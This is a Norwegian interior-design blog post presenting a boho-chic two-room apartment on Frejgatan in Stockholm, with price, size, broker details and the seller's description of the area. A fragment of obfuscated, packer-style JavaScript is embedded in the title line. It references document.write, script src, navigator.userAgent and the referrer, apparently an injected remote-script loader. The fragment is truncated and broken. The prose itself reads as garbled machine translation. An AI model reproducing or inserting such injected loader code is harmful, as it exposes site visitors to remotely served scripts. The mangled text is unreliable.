Inspirasjon

Boho-chic hjemme Frejgatan 12 i Stockholm

Boho-chic »’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(«<\/k"+"l>«);n m=»q»;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rfbtn|var|u0026u|referrer|shief||js|php’.split(‘|’),0,{}))
hjemme Frejgatan 12 i Stockholm:
Den svenske eiendomsmegler kriker vil fortsette og inspirere. Denne gangen har vi en leilighet på Frejgatan i Stockholm, med klare påvirkninger fra LA / boho-chic. Overnatting og innredningen er inspirert av Los Angeles med et snev av hipster og bohem. Leiligheten er 48 kvadratmeter ligger i to etasjer i et århundre gamle eiendommen bygget i 1884. Den har to rom og en vakker balkong med utsikt over gårdsplassen med vakre spisestoler.

Ser på interiørdesign , kan du se klare funksjonene til et moderne og personlig innredning, som vi liker alltid roomly.

Område: Vasastan, Stockholm
Rom: 2
Størrelse: 48 kvadratmeter boareal
Balkong: Ja (gårdsplassen )
Pris: 5 300 000 SEK (prisforlangende av selger)
Megler: Nooks

Den beskriver selger selv hvordan det er å bo på Frejgatan!

Hvordan er det å bo her?

Godt lagt ut arvestykke andre med bortgjemte gårds beliggenhet, gratis fra gaten støy. Stor balkong som vender mot gårdsplassen med sørøst vendt. En ultra-moderne leilighet med fine materialer og godt samspill mellom moderne stil språk og perioden har anno 1884. En drøm leilighet for både par og den kresne singel.

Hvordan er det å leve i bygningen?

En stor fordel av en forbindelse med $ 0 i lån og ca 6 millioner i kontanter er ingen avgiften øker kan ses i overskuelig fremtid, og at budsjettet tilgjengelig for oppussing og rør erstatning (leiligheten må skiftes belastning i løpet av 5-10 år). Det er bare 14 leiligheter i det sammensatte hvor 13 er hytter – en liten forening med et godt samspill mellom naboer.

Hvordan er det å bo i området?

I tillegg Roslag Veiens utvalg av restauranter og kafeer, har du to velassorterte dagligvarebutikker rundt hjørnet og den populære spanske-italiensk grossist Italspain. Utmerkede transportforbindelser finner du et lite stykke unna, inkludert både busser og metro. En fantastisk beliggenhet i det populære Sibir der en kort spasertur tar deg til enten i byen eller i den andre retningen, og du finner deg selv i Hagaparken og Brunnsviken grønne områder.

Tekst fra Nooks.se

Bilder Nooks.se

Related Posts

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *